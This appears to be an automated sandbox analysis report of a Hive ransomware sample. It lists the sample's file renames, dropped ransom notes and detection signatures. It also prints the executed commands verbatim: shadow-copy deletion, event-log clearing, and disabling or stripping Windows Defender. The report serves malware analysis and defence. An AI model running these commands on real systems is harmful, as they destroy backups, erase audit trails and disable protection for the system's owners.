C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 46213c672e82f1f8c20669652a1606a5
SHA1 b0c123a57ae84b56a8559c4c964066274e2d1ad4
SHA256 7d8e1c5b27262d3330fd6535755326519e523f27946933e7352d9c681a3b3d71
SHA512 c58884ac19a9069d93916bb4fea48579d6ce653822b5ab1fb5ca146747bd4707600886d9febe2a810e3699aca3e8ecf9184f340f6ca6f6461329c551d1ef6b45

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 19:26

Reported

2022-01-12 19:31

Platform

win7-en-20211208

Max time kernel

163s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\BackupResolve.png => C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\InstallConvertTo.raw => C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\PushRemove.tiff => C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\WatchSet.tiff => C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\JoinDeny.crw => C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveExit.tiff => C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\MeasureStep.raw => C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteRestart.tiff => C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File renamed C:\Users\Admin\Pictures\StopSet.tiff => C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\7z.sfx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6U2TucaWhHQ0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xH0qJspj4Fo0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_slAnsTm2zaY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_IE19xpdflrg0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_KvGxR9Ny_tE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.INF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_50S4_2GKpi40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ietfb4yDpf40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_qPenILcwkEc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8r8n7O2vh5I0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ot4-BRBpVOw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBENDF98.CHM.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tYNE5h156iE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ejDkUpNb-uE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6Xe4PVKgUZs0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.bmp C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_CKOnfQsRD000.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_H8_ysH1OV5c0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_nOawPqpkPdI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_HJpgra2PKGw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_YZXiE3xprXI0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_PoFgODea85Y0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0240695.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_3oHjEzreFvY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_DD1FktKFpq40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGFJtpgVJ8Q0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tDatXFn3nMs0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_wVoQVlsauuA0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115865.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8RTeLd2R-f40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Media Player\fr-FR\wmpnetwk.exe.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_quaHYc52ueQ0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_disable.gif.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_14QF-F3brxE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGoscHH3fdE0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ajgo8utBdCc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MOlglUL-oY40.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MwbOO68tbHo0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\de-DE\Solitaire.exe.mui.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_SYlWSGO4sU00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8DKzi95OH_Y0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_2TyluNyOAXs0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_E3nas5TA5u80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\GyDM_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_4IrIjFVxFd80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099205.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_NrLVH77nBoc0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105230.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_lmfOb2-shGk0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dwiuYnFxHdY0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21340_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_l3ZfTuzQV9k0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dChs6bXxbhw0.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_9v9J0tGUQx00.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_UUamuYI-GU80.jhps7 C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe N/A
